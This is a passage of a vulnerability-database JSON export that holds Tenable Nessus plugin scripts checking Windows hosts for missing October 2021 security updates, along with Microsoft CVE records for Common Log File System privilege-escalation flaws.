script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-40461\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-10\";\nkbs = make_list('5006670');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19041',\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006670]\n )\n|| smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006670]\n ) \n|| smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006670]\n ) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:10:19", "description": "The remote Windows host is missing security update 5006674. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006674: Windows 11 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-38672", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40468", "CVE-2021-40470", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41332", "CVE-2021-41334", "CVE-2021-41336", "CVE-2021-41338", "CVE-2021-41339", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41347"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006674.NASL", "href": "https://www.tenable.com/plugins/nessus/154042", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154042);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-38672\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40450\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40460\",\n \"CVE-2021-40461\",\n \"CVE-2021-40462\",\n \"CVE-2021-40463\",\n \"CVE-2021-40464\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40468\",\n \"CVE-2021-40470\",\n \"CVE-2021-40475\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41332\",\n \"CVE-2021-41334\",\n \"CVE-2021-41336\",\n \"CVE-2021-41338\",\n \"CVE-2021-41339\",\n \"CVE-2021-41340\",\n \"CVE-2021-41342\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\",\n \"CVE-2021-41347\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"MSKB\", value:\"5006674\");\n script_xref(name:\"MSFT\", value:\"MS21-5006674\");\n\n script_name(english:\"KB5006674: Windows 11 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006674. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006674\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-40461\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006674'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006674])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:09:34", "description": "The remote Windows host is missing security update 5006699. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006699: Windows Server 2022 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-38672", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40456", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40468", "CVE-2021-40469", "CVE-2021-40470", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41332", "CVE-2021-41334", "CVE-2021-41336", "CVE-2021-41337", "CVE-2021-41338", "CVE-2021-41339", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41347", "CVE-2021-41357", "CVE-2021-41361"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006699.NASL", "href": "https://www.tenable.com/plugins/nessus/154029", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154029);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-38672\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40450\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40456\",\n \"CVE-2021-40460\",\n \"CVE-2021-40461\",\n \"CVE-2021-40462\",\n \"CVE-2021-40463\",\n \"CVE-2021-40464\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40468\",\n \"CVE-2021-40469\",\n \"CVE-2021-40470\",\n \"CVE-2021-40475\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41332\",\n \"CVE-2021-41334\",\n \"CVE-2021-41336\",\n \"CVE-2021-41337\",\n \"CVE-2021-41338\",\n \"CVE-2021-41339\",\n \"CVE-2021-41340\",\n \"CVE-2021-41342\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\",\n \"CVE-2021-41347\",\n \"CVE-2021-41357\",\n \"CVE-2021-41361\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"MSKB\", value:\"5006699\");\n script_xref(name:\"MSFT\", value:\"MS21-5006699\");\n\n script_name(english:\"KB5006699: Windows Server 2022 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006699. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006699\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-40461\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006699'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006699])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T17:02:52", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a remote code execution vulnerability in the MSHTML platform. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41342"], "modified": "2022-01-26T00:00:00", "cpe": ["cpe:2.3:a:microsoft:ie:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS21_OCT_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/154032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154032);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\"CVE-2021-41342\");\n script_xref(name:\"MSKB\", value:\"5006671\");\n script_xref(name:\"MSKB\", value:\"5006714\");\n script_xref(name:\"MSKB\", value:\"5006736\");\n script_xref(name:\"MSKB\", value:\"5006739\");\n script_xref(name:\"MSKB\", value:\"5006743\");\n script_xref(name:\"MSFT\", value:\"MS21-5006671\");\n script_xref(name:\"MSFT\", value:\"MS21-5006714\");\n script_xref(name:\"MSFT\", value:\"MS21-5006736\");\n script_xref(name:\"MSFT\", value:\"MS21-5006739\");\n script_xref(name:\"MSFT\", value:\"MS21-5006743\");\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n\n script_name(english:\"Security Updates for Internet Explorer (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a\nremote code execution vulnerability in the MSHTML platform. An unauthenticated, remote attacker can exploit this to\nbypass authentication and execute arbitrary commands.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5006671\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5006714\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5006736\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5006739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5006743\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5006671\n -KB5006714\n -KB5006736\n -KB5006739\n -KB5006743\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41342\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nvar bulletin = 'MS21-10';\nvar kbs = make_list(\n '5006671',\n '5006714',\n '5006736',\n '5006739',\n '5006743'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nvar os = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20139\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5006671\") ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20139\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5006671\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.20139\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5006671\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21601\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5006671\")\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5006671 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == \"6.3\")\n {\n report += ' - KB5006714 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5006714', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB5006739 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5006739', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB5006743 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5006743', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB5006736 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5006736', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2022-03-17T17:46:03", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40443, CVE-2021-40467. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40443", "CVE-2021-40466", "CVE-2021-40467"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40466", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40466", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:46:02", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40443, CVE-2021-40466. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40443", "CVE-2021-40466", "CVE-2021-40467"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-40467", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40467", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:46:16", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40466, CVE-2021-40467. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": 